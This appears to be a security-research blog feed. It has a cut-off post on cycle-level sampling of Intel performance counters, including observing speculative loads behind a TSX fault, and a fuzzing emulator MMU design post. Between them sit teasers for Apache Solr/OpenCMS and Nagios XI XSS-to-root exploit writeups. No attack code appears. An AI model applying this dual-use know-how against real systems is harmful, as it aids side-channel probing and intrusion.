But there’s a small little trick we can use. We can stop multiple performance counters at the same time by using the IA32_DEBUGCTL.Freeze_PerfMon_On_PMI feature. When a counter ends up overflowing, an interrupt occurs (if configured as such). When this overflow occurs, the freeze bit in IA32_PERF_GLOBAL_STATUS is set (version 4 PMCs specific feature), causing all performance counters to stop.

This means that if we can cause an overflow on each cycle boundary, we could potentially capture the time and the event we’re interested in at the same time. Doing this isn’t too difficult either, we can simply pre-program the performance counter value IA32_PMCx to N away from overflow. In our specific case, we’re dealing with a 48-bit performance counter. So in theory if we program PMC0 to count number of cycles, set the counter to 2^48 - N where N is >= 1, we can get an interrupt, and thus an “atomic” disabling of performance counters after N cycles.

If we set up a deterministic enough execution environment, we can run the same code over and over, while adjusting N to sample the code at a different cycle count.

This relies on a lot of assumptions. We’re assuming that the freeze bit ends up disabling both performance counters at the same time (“atomically”), we’re assuming we can cause this interrupt on an arbitrary cycle boundary (even during multi-cycle instructions), and we also are assuming that we can execute code in a clean enough environment where we can do multiple runs measuring different cycle offsets.

So… lets try it!

The Implementation

A simple pseudo-code implementation of this sampling method looks as such:

/// Number of times we want to sample each data point. This allows us to look
/// for the minimum, maximum, and average values. This also gives us a way to
/// verify that the environment we're in is deterministic and the results are
/// sane. If minimum == maximum over many samples, it's safe to say we have a
/// very clear picture of what is happening.
const NUM_SAMPLES: u64 = 1000;

/// Maximum number of cycles to sample on the x-axis. This limits the sampling
/// space.
const MAX_CYCLES: u64 = 1000;

// Program the APIC to map the performance counter overflow interrupts to a
// stub assembly routine which simply `iret`s out
configure_pmc_interrupts_in_apic();

// Configure performance counters to freeze on interrupts
perf_freeze_on_overflow();

// Iterate through each performance counter we want to gather data on
for perf_counter in performance_counters_of_interest {
    // Disable and reset all performance counters individually
    // Clearing their counts to 0, and clearing their event select MSRs to 0
    disable_all_perf_counters();

    // Disable performance counters globally by setting IA32_PERF_GLOBAL_CTRL
    // to 0
    disable_perf_globally();

    // Enable a performance counter (lets say PMC0) to track the `perf_counter`
    // we're interested in. Note that this doesn't start the counter yet, as we
    // still have the counters globally disabled.
    enable_perf_counter(perf_counter);

    // Go through each number of samples we want to collect for this performance
    // counter... for each cycle offset.
    for _ in 0..NUM_SAMPLES {
        // Go through each cycle we want to observe
        for cycle_offset in 1..=MAX_CYCLES {
            // Clear out the performance counter values: IA32_PMCx fields
            clear_perf_counters();

            // Program fixed counter #1 (un-halted cycle counter) to trigger
            // an interrupt on overflow. This will cause an interrupt, which
            // will then cause a freeze of all PMCs.
            program_fixed1_interrupt_on_overflow();

            // Program the fixed counter #1 (un-halted cycle counter) to
            // `cycles` prior to overflowing
            set_fixed1_value((1 << 48) - cycle_offset);

            // Do some pre-test environment setup. This is important to make
            // sure we can sample the code under test multiple times and get
            // the same result. Here is where you'd be flushing cache lines,
            // maybe doing a `wbinvd`, etc.
            set_up_environment();

            // Enable both the fixed #1 cycle counter and the PMC0 performance
            // counter (tracking the stat we're interested in) at the same time,
            // by using IA32_PERF_GLOBAL_CTRL. This is serializing so you don't
            // have to worry about re-ordering across this boundary.
            enable_perf_globally();

            asm!(r#"

                asm
                under
                test
                here

            "# :::: "volatile");

            // Clear IA32_PERF_GLOBAL_CTRL to 0 to stop counters
            disable_perf_globally();

            // If fixed PMC #1 has not overflowed, then we didn't capture
            // relevant data. This only can happen if we tried to sample a
            // cycle which happens after the assembly under test executed.
            if fixed1_pmc_overflowed() == false {
                continue;
            }

            // At this point we can do whatever we want as the performance
            // counters have been turned off by the interrupt and we should have
            // relevant data in both :)

            // Get the count from fixed #1 PMC. It's important that we grab this
            // as interrupts are not deterministic, and thus it's possible we
            // "overshoot" the target
            let fixed1_count = read_fixed1_counter();

            // Add the distance-from-overflow we initially programmed into the
            // fixed #1 counter, with the current value of the fixed #1 counter
            // to get the total number of cycles which have elapsed during
            // our example.
            let total_cycles = cycle_offset + fixed1_count;

            // Read the actual count from the performance counter we were using.
            // In this case we were using PMC #0 to track our event of interest.
            let value = read_pmc0();

            // Somehow log that performance counter `perf_counter` had a value
            // `value` `total_cycles` into execution
            log_result(perf_counter, value, total_cycles);
        }
    }
}

Simple results

So? Does it work? Let’s try with a simple example of code that just does a few “nops” by adjusting the stack a few times:

add rsp, 8
sub rsp, 8
add rsp, 8
sub rsp, 8

Simple Sample

So how do we read this graph? Well, the x-axis is simple. It’s the time, in cycles, of execution. The y-axis is the number of events (which varies based on the key). In this case we’re only graphing the number of instructions retired (successfully executed).

So does this look right? Hmmm…. we ran 4 instructions, why did we see 8 retire?

Well in this case there’s a little bit of “extra” noise introduced by the harnessing around the code under test. Let’s zoom out from our code and look at what actually executes during our test:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f ; IA32_PERF_GLOBAL_CTRL
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

; Here's our code under test :D
00000011  4883C408          add rsp,byte +0x8
00000015  4883EC08          sub rsp,byte +0x8
00000019  4883C408          add rsp,byte +0x8
0000001D  4883EC08          sub rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000021  B98F030000        mov ecx,0x38f
00000026  31C0              xor eax,eax
00000028  31D2              xor edx,edx
0000002A  0F30              wrmsr

So if we take another look at the graph, we see there are 8 instructions that retired. The very first instruction we see retire (at cycle=11), is actually the wrmsr we used to enable the counters. This makes sense, at some point prior to retirement of the wrmsr instruction the counters must be enabled internally somewhere in the CPU. So we actually get to see this instruction retire!

Then we see 7 more instructions retire to give us a total of 8… hmm. Well, we have 4 of our add and sub mix that we executed, so that brings us down to 3 more remaining “unknown” instructions.

These 3 remaining instructions are explained by the code which disables the performance counter after our test code has executed. We have 1 mov, and 2 xor instructions which retire prior to the wrmsr which disables the counters. It makes sense that we never see the final wrmsr retire as the counters will be turned off in the CPU prior to the wrmsr instruction retiring!

Wala! It all makes sense. We now have a great view into what the CPU did in terms of retirement for this code in question. Everything we saw lined up with what actually executed, always good to see.

A bit more advanced result

Lets add a few more performance counters to track. In this case lets track the number of instructions retired, as well as the number of micro-ops dispatched to port 4 (the store port). This will give us the number of stores which occurred during test.

Code to test (just a few writes to the stack):

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  4883EC08          sub rsp,byte +0x8
00000015  48C7042400000000  mov qword [rsp],0x0
0000001D  4883C408          add rsp,byte +0x8
00000021  4883EC08          sub rsp,byte +0x8
00000025  48C7042400000000  mov qword [rsp],0x0
0000002D  4883C408          add rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000031  B98F030000        mov ecx,0x38f
00000036  31C0              xor eax,eax
00000038  31D2              xor edx,edx
0000003A  0F30              wrmsr

Store Sample

This one is fun. We simply make room on the stack (sub rsp), write a 0 to the stack (mov [rsp]), and then restore the stack (add rsp), and then do it all again one more time.

Here we added another plot to the graph, Port 4, which is the store uOP port on the CPU. We also track the number of instructions retired, as we did in the first example. Here we can see instructions retired matches what we would expect. We see 10 retirements, 1 from the first wrmsr enabling the performance counters, 6 from our own code under test, and 3 more from the disabling of the performance counters.

This time we’re able to see where the stores occur, and indeed, 2 stores do occur. We see a store happen at cycle=28 and cycle=29. Interestingly we see the stores are back-to-back, even though there’s a bit of code between them. We’re probably observing some re-ordering! Later in the graph (cycle=39), we observe that 4 instructions get retired in a single cycle! How cool is that?!

How deep can we go?

Using the exact same store example from above, we can enable even more performance counters. This gives us an even more detailed view of different parts of the micro-architectural state.

Busy Sample

In this case we’re tracking all uOP port activity, machine clears (when the CPU resets itself after speculation), offcore requests (when messages get sent offcore, typically to access physical memory), instructions retired, and branches retired. In theory we can measure any possible performance counter available on our micro-architecture on a time domain. This gives us the ability to see almost anything that is happening on the CPU!

Noise…

In all of the examples we’ve looked at, none of the data points have visible error bars. In these graphs the error bars represent the minimum value, mean value, and maximum value observed for a given data point. Since we’re running the same code over and over, and sampling it at different execution times, it’s very possible for “random” noise to interfere with results. Let’s look at a bit more noisy example:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  48C7042500000000  mov qword [0x0],0x0
         -00000000
0000001D  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000029  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000035  48C7042500000000  mov qword [0x0],0x0
         -00000000

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000041  B98F030000        mov ecx,0x38f
00000046  31C0              xor eax,eax
00000048  31D2              xor edx,edx
0000004A  0F30              wrmsr

Here we’re just going to write to NULL 4 times. This might sound bad, but in this example I mapped NULL in as normal write-back memory. Nothing crazy, just treat it as a valid address.

But here are the results:

Noise Sample

Hmmm… we have error bars! We see the stores always get dispatched at the same time. This makes sense, we’re always doing the same thing. But we see that some of the instructions have some variance in where they retire. For example, at cycle=38 we see that sometimes at this point 2 instructions have been retired, other times 4 have been retired, but on average a little over 3 instructions have been retired at this point. This tells us that the CPU isn’t always deterministic in this environment.

These results can get a bit more complex to interpret, but it’s still relevant data nevertheless. Changing the code under test, cleaning up to the environment to be more determinsitic, etc, can often improve the quality and visibility of the data.

Does it work with speculation?

Damn right it does! That was the whole point!

Let’s cause a fault, perform some loads behind it, and see if we can see the loads get issued even though the entire section of code is discarded.

    // Start a TSX section, think of this as a `try {` block
    xbegin 2f

    // Read from -1, causing a fault
    mov rax, [-1]

    // Here's some loads shadowing the faulting load. These
    // should never occur, as the instruction above causes
    // an exeception and thus execution should "jump" to the label `2:`

    .rept 32
        // Repeated load 32 times
        mov rbx, [0]
    .endr

    // End the TSX section, think of this as a `}` closing the
    // `try` block
    xend

2:
    // Here is where execution goes if the TSX section had
    // an exception, and thus where execution will flow

Speculation Sample

Both ports 2 and port 3 are load ports. We see both of them taking turns handling loads (1 load per cycle each, with 2 ports, 2 loads per cycle total). Here we can see many different loads get dispatched, even though very few instructions actually retire. What we’re viewing here is the micro-architecture performing speculation! Neat!

More data?

I could go on and on graphing different CPU behaviors! There’s so much cool stuff to explore out there. However, this blog has already gotten longer than I wanted, so I’ll stop here. Maybe I’ll make future small blogs about certain interesting behaviors!


Conclusion

This technique of measuring performance counters on a time-domain seems to work quite well. You have to be very careful with noise, but with careful interpretation of the data, this technique provides the highest level of visibility into the Intel micro-architecture that I’ve ever seen!

This tool is incredibly useful for validating hypothesises about behaviors of various Intel micro-architectures. By running multiple experiments on different behaviors, a more macro-level model can be derived about the inner workings of the CPU. This could lead to learning new optimization techniques, finding new CPU vulnerabilities, and just in general having fun learning how things work!


Source?

Update: 8/19/2019

This kernel has too many sensitive features that I do not want to make public at this time…

However, it seems there’s a lot of interest in this tech, so I will try to live stream soon adding this functionality to my already-open-source kernel Orange Slice!


Exploiting Apache Solr through OpenCMS

13 April 2019 at 09:19
Tl;dr It’s possible to exploit a known Apache Solr vulnerability through OpenCMS. Introduction meme During one of my last Penetration Test I was asked to analyze some OpenCMS instances. Before the assessment I wasn’t really familiar with OpenCMS, so I spent some time on the official documentation in order to understand how it works, which is the default configuration and if there are some security-related configurations which I should check during the test.

Nagios XI 5.5.10: XSS to #

10 April 2019 at 13:10
Tl;dr A remote attacker could trick an authenticated victim (with “autodiscovery job” creation privileges) to visit a malicious URL and obtain a remote root shell via a reflected Cross-Site Scripting (XSS), an authenticated Remote Code Execution (RCE) and a Local Privilege Escalation (LPE). Introduction A few months ago I read about some Nagios XI vulnerabilities which got me interested in studying it a bit by myself. For those of you who don’t know what Nagios XI is I suggest you have a look at their website.

WebTech, identify technologies used on websites

8 March 2019 at 00:37
Introduction We’re very proud to release WebTech as open-source software. WebTech is a Python software that can identify web technologies by visiting a given website, parsing a single response file or replaying a request described in a text file. This way you can have reproducible results and minimize the requests you need to make to a target website. The RECON phase in a Penetration Test is one among the most important ones.

FridaLab – Writeup

4 February 2019 at 15:20
Today I solved FridaLab, a playground Android application for playing with Frida and testing your skills. The app is made of various challenges, with increasing difficulty, that will guide you through Frida’s potential. This is a writeup with solutions to the challenges in FridaLab. We suggest the reader to take a look at it and try to solve it by itself before reading further. In this writeup we will assume that the reader has a working environment with frida-server already installed on the Android device and frida-tools installed on the PC as well, since we will not cover those topics.

Vectorized Emulation: MMU Design

19 November 2018 at 19:10

Softserve

New vectorized emulator codenamed softserve

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up.

Check out the intro

This is the continuation of a multipart series. See the introduction post here

This post assumes you’ve read the intro and doesn’t explain some of the basics of the vectorized emulation concept. Go read it if you haven’t!

Further this blog is a lot more technical than the introduction. This is meant to go deep enough to clear up most/all potential questions about the MMU. It expects that you have a general knowledge of page tables and virtual addressing models. Hopefully we do a decent job explaining these things such that it’s not a hard requirement!

The code

This blog explains the intent behind a pretty complex MMU design. The code that this blog references can be found here. I have no plans to open source the vectorized emulator and this MMU is just a snapshot of what this blog is explaining. I have no intent to update this code as I change my MMU model. Further this code is not buildable as I’m not open sourcing my assembler, however I assume the syntax is pretty obvious and can be read as pseudocode.

By sharing this code I can talk at a higher level and allow the nitty-gritty details to be explained by the actual implementation.

It’s also important to note that this code is not being used in production yet. It’s got room for micro-optimizations and polish. At least it should be doing the correct operations and hopefully the tests are verifying this. Right now I’m trying to keep it simple to make sure it’s correct and then polish it later using this version as reference.

Intro

Today we’re going to talk about the internals of the memory management unit (MMU) design I have used in my vectorized emulator. The MMU is responsible for creating the fake memory environment of the VMs that run under the emulator. Further the MMU design used here also is designed to catch bugs as early as possible. To do this we implement what I call a “byte-level MMU”, where each byte has it’s own permission bits. Since vectorized emulation is meant for fuzzing it’s also important that the memory state can quickly be restored to the original state quickly so a new fuzz iteration can be started.

During this blog we introduce a few big concepts:

  • Differential restores
  • Byte-level permissions
  • Read-after-write memory (uninitialized memory tracking)
  • Gage fuzzing
  • Aliased/CoW memory
  • Deduplicated memory
  • Technical details about the IL relevant to the MMU
  • Painful details about everything

Since this emulator design is meant to run multiple architectures and programs in different environments, it’s critical the MMU design supports a superset of the features of all the programs I may run. For example, system processes typically are run in the high memory ranges 0xffff... and above. Part of the design here is to make sure that a full guest address space can be used, including high memory addresses. Things like x86_64 have 48-bit address spaces, where things like ARM64 have 49-bit address spaces (2 separate 48-bit address spaces). Thus to run an ARM64 target on x86 I need to provide more bits than actually present. Luckily most systems use this address space sparsely, so by using different data structures we can support emulating these targets with ease.

The problem

Before we get into describing the solution, let’s address what the problem is in the first place!

When creating an emulator it’s important to create isolation between the emulated guest and the actual system. For example if the guest accesses memory, it’s important that it can only access it’s own memory, and it isn’t overwriting the emulator’s memory itself. To do this there are multiple traditional solutions:

  • Restrict the address space of the guest such that it can fit entirely in the emulator’s address space
  • Use a data structure to emulate a sparse guest’s memory space
  • Create a new process/VM with only the guest’s memory mapped in

The first solution is the simplest, fastest, but also the least portable. It typically consists of allocating a buffer the size of the guest’s address space, and then any guest memory accesses are added to the base of this buffer and ensured to not go out of bounds. A model like this can rely on the hardware’s permission checking by setting permissions via mmap or VirtualProtect. This is an extremely fast model and allows for running applications that fit inside of the emulator’s address space. When running a 64-bit VM this can become tough as most OSes do not provide a means of allocating memory in the high part of the address space 0xffff... and beyond. This memory is typically reserved for the kernel. This is the model used by things like qemu-user as it is super fast and works great for well-behaving userland applications. By setting the QEMU_GUEST_BASE environment variable you can change this base and set the size with QEMU_RESERVED_VA.

The second solution is fairly slow, but allows for more strict memory permissions than the host system allows. Typically the data structure used to access the guest’s memory is similar to traditional page table models used in hardware. However since it’s implemented in software it’s possible to change these page tables to contain any metadata or sizes as desired. This is the model I ultimately use, but with a few twists from traditional page tables.

The third solution leverages something like VT-x or a thin process to almost directly use the target hardware’s page table models for a VM. This will make the emulator tied to an architecture, might require a driver, and like the first solution, doesn’t allow for stricter memory models. This is actually one of the first models I used in my emulator and I’ll go into it a bit more in the history section


History

Feel free to skip this section if you don’t care about context

To give some background on how we ended up where we ended up it’s important to go through the background of the MMU designs used in the past. Note that the generations aren’t the same MMU improving, it’s just different MMUs I’ve designed over time.

First generation

The first generation of my MMU was a simple modification to QEMU to allow for quick tracking of which memory was modified. In this case my target was a system level target so I was not using qemu-user, but rather qemu-system. I ripped out the core physical memory manager in QEMU and replaced it with my own that effectively mimicked the x86 page table model. I was most comfortable with the x86 page table model and since it was implemented in hardware I assumed it was probably well engineered. The only interest I had in this first MMU was to quickly gather which memory was modified so I could restore only the dirtied memory to save time during reset time. This had a huge improvement for my hypervisor so it was natural for me to just copy it over the QEMU so I could get the same benefits.

Second generation

While still continuing on QEMU modifications I started to get a bit more creative. Since I was handling all the physical memory accesses directly in software, there was no reason I couldn’t use page tables of my own shape. I switched to using a page table that supported 32-bit addresses (my target was MIPS32 and ARM32) using 8-bits per table. This gave me 256-byte pages rather than traditional 4-KiB x86 pages and allowed me to reset more specific dirty pages and reduces the overall work for resets.

Third generation

At this point I was tinkering around with different page table shapes to find which worked fast. But then I realized I could set the final translation page size to 1-byte and I would be able to apply permissions to any arbitrary location in memory. Since memory of the target system was still using 4-KiB pages I wasn’t able to apply byte-level permissions in the snapshotted target, however I was able to apply byte-level permissions to memory returned from hooked functions like malloc(). By setting permissions directly to the size actually requested by malloc() we could find 1-byte out-of-bounds memory accesses. This ended up finding a bug which was only slightly out-of-bounds (1 or 2 bytes), and since this was now a crash it was prioritized for use in future fuzz cases. This prioritization (or feedback) eventually ended up with the out-of-bounds growing to hundreds of bytes, which would crash even on an actual system.

Fourth generation

I ended up designing my own emulator for MIPS32, performance wasn’t really the focus. I basically copied the model I used for the 3rd generation. I also kept the 1-byte paging as by this point it was a potent tool in my toolbag. However once I switched this emulator to use JIT I started to run into some performance issues. This caused me to drop the emulated page tables and byte level permissions and switch to a direct-memory-access model.

At this time I was doing most of my development for my emulator to run directly on my OS. Since my OS didn’t follow any traditional models this allowed me to create a user-land application with almost any address space as I wanted. I directly used the MMU of the hardware to support running my JIT in the context of a different address space. In this model the JITted code just directly accessed memory, which except for a few pages in the address space, was just the exact same as the actual guest’s address space.

For example if the guest wanted to access address 0x13370000, it would just directly dereference the memory at 0x1337000. No translation, not base applied, simple.

You can see this code in the srcs/emu folder in falkervisor.

I used this model for a long time as it was ideal for performance and didn’t really restrict the guest from any unique address space shapes. I used this memory model in my vectorized emulator for quite a while as well, but with a scale applied to the address as I interleaved multiple VM’s memory.

Fifth generation

The vectorized emulator was initially designed for hard targets, and the primary goal was to extract as much information as possible from the code under test. When trying to improve it’s ability to find bugs I remembered that in the past I had done a byte-level MMU with much success. I had a silly idea of how I could handle these permission checks. Since in the JIT I control what code is run when doing a read or write, I could simply JIT code to do the permission checks. I decided that I would simply have 1 extra byte for every byte of the target. This byte would be all of the permissions for the corresponding byte in the memory map (read, write, and/or execute).

Since now I needed to have 2 memory regions for this, I started to switch from using my OS and the stripped down user-land process address space to using 2 linear mappings in my process. Since this was more portable I decided to start developing my vectorized emulator to run on just Windows/Linux. On a guest memory access I would simply bounds check the address to make sure it’s in a certain range, and then add the address to the base/permission allocations. This is similar to what qemu-user does but with a permission region as well. The JIT would check these permissions by reading the permissions memory first and checking for the corresponding bits.

Sixth generation

The performance of the fifth generation MMU was pretty good for JIT, but was terrible for process start times. I would end up reserving multiple terabytes of memory for the guest address spaces. This made it take a long time to start up processes and even tear them down as they blocked until the OS cleaned up their resources. Further commit memory usage was quite high as I would commit entire 4-KiB guest pages, which were actually 128-KiB (16 vectorized VMs * 2 regions (permission and memory region) * 4 KiB). To mitigate these issues we ended up at the current design….


Page Tables

Before we hop into soft MMU design it’s important to understand what I mean when I say page tables. Page tables take some bit-slice of the address to be translated and use it as the index for an element in a first level table. This table points to another table which is then indexed by a different bit-slice of the same address. This may continue for however many levels are used in the page table. In my case the shape of this page table is dynamically configurable and we’ll go into that a bit more.

Page table

In the case of 64-bit x86 there is a 4 level lookup, where 9 bits are used for each level. This means each page table contains 512 entries. Each entry is a pointer to the next page table, or the actual page if it’s the final level. Finally the bottom 12 bits of the address are used as the offset into the page to find the specific byte. This paging model would show up as [9, 9, 9, 9, 12] according to my dynamic paging model. This syntax will be explained later.

For x86 there are alignment requirements for the page table entries (must be 4-KiB aligned). Further physical addresses are only 52-bits. This leaves 12 bits at the bottom of the page table entry and 12 bits at the top for use as metadata. x86 uses this to store information such as: If the page is present, writable, privileged, caching behavior, whether it’s been accessed/modified, whether it’s executable, etc. This metadata has no cost in hardware but in software, traversing this has a cost as the metadata must be masked off for the pointer to be extracted. This might not seem to matter but when doing billions of translations a second, the extra masking operations add up.

Here’s the actual metadata of a 4 KiB page on 64-bit Intel:

Page table metadata


The overall design

My vectorized emulator is being rewritten to be 64-bit rather than 32-bit. We’re now running 2048 VMs rather than 4096 VMs as we can only run 8 VMs per thread. All of this design is for 64-bits.

When designing the new MMU there were a few critical features it needed:

  • Byte level permissions
  • Fast snapshot/restore times
  • A data structure that could be quickly traversed in JIT
  • Quick process start times
  • The ability to handle full 64-bit address spaces
  • Low memory usage (we need to run 2048 VMs)
  • Quick methods for injecting fuzz inputs (we need a way to get fuzz inputs in to the memory millions of times per second)
  • Must be easily tested for correctness
  • Ability to track uninitialized memory at a byte-level
  • Read-only memory shared between all cores

Applying byte-level permissions

So we have this byte-level permission goal, but how do we actually get byte-level information to apply anyways?

Since most fuzzing is done from an already-existing snapshot from a real system with 4 KiB paging and permissions, we cannot just magically get byte-level permissions. We have to find locations that can be restricted to specific byte-level sizes.

The easiest way to do this is just ignore everything in the snapshot. We can apply byte-level permissions to only new memory allocations that we emulate by adding breakpoints to the target’s allocate routines. Further by hooking frees we can delete the mappings and catch use-after-frees.

We can get a bit more fancy if we’re enlightened as to the internals of the allocator of the target under test. Upon loading of the snapshot we could walk the heap metadata and trim down allocations to the byte-level sizes they originally requested. If the heap does not provide the requested size then this is not possible. Further allocations which fit perfectly in a bin might not have any room after them to place even a single guard byte.

To remedy these problems there a few solutions. We can use page heap in the application we’re taking a snapshot in, which will always ensure we have a page after the allocation we can play with for guard bytes. Further page heap has the requested size in the metadata so we can get perfect byte-level applied.

If page heap is not available for the allocator you’re gonna have to get really creative and probably replace the allocator. You could also hack it up and use a debugger to always add a few bytes to each allocation (ensuring room for guard bytes), while logging the requested sizes. This information could then be used to create a perfect byte heap.

Getting even fancier

When going at a really hard target you could also start to add guard bytes between padding fields of structures (using symbol information or compiler plugins) and globals. The more you restrict, the more you can detect.


Design features

Basics of the vectorized model

This was covered in the intro, but since it’s directly applicable to the MMU it’s important to mention here.

Memory between the different lanes on a given core is interleaved at the 8-byte level (4-byte level for 32-bit VMs). This means that when accessing the same address on all VMs we’re able to dispatch a single read at one address to load all 8 VM’s memory. This has the downside of unaligned memory accesses being much more expensive as they now require multiple loads. However the common case most memory is accessed at the same address, and memory does not straddle a 8-byte boundary. It’s worth it.

For reference the cost of a single load instruction vmovdqa64 is about 4-5 cycles, where a vpgatherqq load is 20-30 cycles. Unless memory is so frequently accessed from different addresses and straddling 8-byte boundaries it is always worth interleaving.

VM interleaving looks as follows:

chart simplified to show 4 lanes instead of 8

Guest Address Host Address Qword 1 Qword 2 Qword 3 Qword 8
0x0000 0x0000 1 2 3 33
0x0008 0x0040 32 74 55 45
0x0010 0x0080 24 24 24 24

This interleaves all the memory between the VMs at an 8-byte level. If a memory access straddles an 8-byte value things get quite slow but this is a rare case and we’re not too concerned about it.

How do we build a testable model?

To start off development it was important to build a good foundation that could be easily tested. To do this I tried to write everything as naive as possible to decrease the chance of mistakes. Since performance is only really required in the JIT, the Rust-level MMU routines were written cleanly and used as the reference implementation to test against. If high-performance methods were needing for modifying memory or permissions they would be supplemental and verified against the naive implementation. This set us up to be in good shape for testing!

64-bit address spaces

To support full 64-bit address spaces we are forced to use some data structure to handle memory as nothing in x86 can directly use a 64-bit address space. Page tables continue to be the design we go with here.

Since we were writing the code in a naive way, it was easy to make most of the MMU model configurable by constants in the code. For example the shape of the page tables is defined by a constant called PAGE_TABLE_LAYOUT. This is used in reality in the form: const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];.

This array defines the number of bits used for translating each level in the page table, and PAGE_TABLE_DEPTH sets the number of levels in the page table. In the example above this shows that we use the top 16-bits for the first level as the index, the next 16-bits for the next level, the next 16-bits again for another level, a 13-bit level, and finally a 3-bit page size. As long as this PAGE_TABLE_LAYOUT adds up to 64-bits, contains at least 2 entries (1 level page table), and at least has a final translation size of 8-byte (like in the example), the MMU and JITs will be updated. This allows profiling to be done of a specific target and modify the page table to whatever shape works best. This also allows for changes between performance and memory usage if needed.

Fast restores

When writing my hypervisor I walked the SVM page tables looking for dirty pages to restore. On x86 there are only dirty bits on the last level of the page tables. For all other levels there’s only an ‘accessed’ bit (updated when the translation is used for any access). I would walk every entry in each page table, if it was accessed I would recurse to the next level, otherwise skip it, at the final level I would check for the dirty bit and only restore the memory if it was marked as dirty. This meant I walked the page tables for all the memory that was ever used, but only restored dirty memory. Walking the page tables caused quite a bit of cache pollution which would cause significant damage to the performance of other cores.

To speed this up I could potentially place a dirty bit on every page table level, and then I would only ever start walking a path that contains a dirty page. I used this model at some point historically, however I’ve got a better model now.

Instead of walking page tables I just now append the address to a vector when I first set a dirty bit. This means when resetting a VM I only read a linear array of addresses to restore. I still need a dirty bit somewhere so I make sure I don’t add duplicates to this list. Since I no longer need to walk page tables I only put dirty bits on the final level. This was a decision driven by actual data on real targets, it’s much faster.

If during execution I run out of entries in this dirty list I exit out of the VM with a special VM-exit status indicating this list is full. This then allows me to append this list at Rust-level to a dynamically sized allocation. Since the size of this list is tunable it would grow as needed and converge to never hitting VM-exits due to dirty list exhaustion. Further this dirty list is typically pretty tiny so the cost isn’t that high.

Interestingly Intel introduced (not sure if it’s in silicon yet) a way of getting a similar thing for VMs (this is called Page Modification Logging). The processor itself will give you a linear list of dirty pages. We do not use this as it is not supported in the processor we are using.

Permissions

On classic x86 (and really any other architecture) permissions bits are added at each level of the page table. This allows for the processor to abort a page table walk early, and also allows OSes to change permissions for large regions of memory by updating a single entry. However since we’re running multiple VM’s at the same time it’s possible each VM has different memory mapped in. To handle this we need a permission byte for each byte for each VM.

Since we can’t handle the permissions checks during the page table walk (technically could be possible if the permissions are a superset of all the VM’s permissions), we get to have a metadata-less page table walk until the final level where we store the dirty bit. This means that during a page table walk we do not need to mask off bits, we can just directly keep dereferencing.

There are currently 4 permission bits. A read bit, a write bit, an execute bit, and a RaW bit (see next section). All of these bits are completely independent. This allows for arbitrary permission sets like write-only memory, and execute-only memory.

In some older versions of my MMU I had a page table for both permissions and data. This is pretty pointless as they always have the same shape. This caused me to perform 2 page table walks for every single memory access.

In the new model I interleave the memory and permissions for the VMs such that one walk will give me access to the permissions and memory contents. Further in memory the permissions come first followed by the contents. Since permissions are checked first this allows for the memory to be accessed linearally and potentially get a speedup by the hardware prefetchers.

When permissions and contents are laid out in a pretty format it looks something like:

Simplified to 4 lanes instead of 8 MMU layout

We can see every byte of contents has a byte of permissions and the permissions come first in memory. This image displays directly how the memory looks if you were to dump the MMU region for a page as qwords.

Uninitialized memory tracking

To track uninitialized memory I introduce a new permission bit called the RaW (read-after-write) bit. This bit indicates that memory is only readable after it has been written to. In allocator hooks or by manual application to regions of memory this bit can be set and the read bit cleared.

On all writes to memory the RaW it is unconditionally copied to the read bit. It’s done unconditionally because it’s cheaper to shift-and-or every time than have a conditional operation.

Simple as that, now memory marked as RaW and non-readable will become readable on writes! Just like all other permission bits this is byte-level. malloc()ing 8 bytes, writing one byte to it, and then reading all 8 bytes will cause an uninitialized memory fault!


Gage fuzzing

Okay there’s probably a name for this already but I call it ‘gage’ fuzzing (from gage blocks, precisely ground measurement references). It’s a precise fuzzing technique I use where I start without a snapshot at all, but rather just the code. In this case I load up a PE/ELF, mark all writable regions as read-after-write, and point PC to a function I want to fuzz. Further I set up the parameters to the function, and if one of the parameters happens to be a pointer to memory I don’t understand yet, I can mark the contents of the pointer to read-after-write as well.

As globals and parameters are used I get faults telling me that uninitialized memory was used. This allows me to reverse out the specific fields that the function operates on as needed. Since the memory is read-after-write, if the function writes to the memory prior to reading it then I don’t have to worry what that memory is at all.

This process is extremely time consuming, but it is basically dynamic-driven reversing/source auditing. You lazily reverse the things you need to, which forces you to understand small pieces at a time. While you build understanding of the things the function uses you ultimately learn the code and learn potential places to audit more or add things like guard bytes.

This is my go-to methodology for fuzzing extremely hard targets where every advantage is required. Further this works for fuzzing codebases which are not runnable, or you only have partial snapshots of. Works great for kernel fuzzing or firmware fuzzing when you don’t have a great way of getting a snapshot!

I mention ‘function’ in this case but there’s nothing restricting you from fuzzing a whole application with this model. Things without global state can be trivially fuzzed in their entirety with a model like this. Further, I’ve done things like call the init routine for a class/program and then jump to the parser when init returns to skip some of the manual processing.


Theory into practice

So we know the features and what we want in theory, however in practice things get a lot harder. We have to abide by the design decisions while maintaining some semblance of performance and support for edge cases in the JIT.

We’ve got a few things that could make this hard to JIT. First of all performance is going to be an issue, we need to find a way to minimize the frequency of page table walks as well as decrease the cost of a walk itself. Further we have to be able to support edge cases where VMs are disabled, pages are not present, and VMs are accessing different memory at the same time.

64-bit saves the day

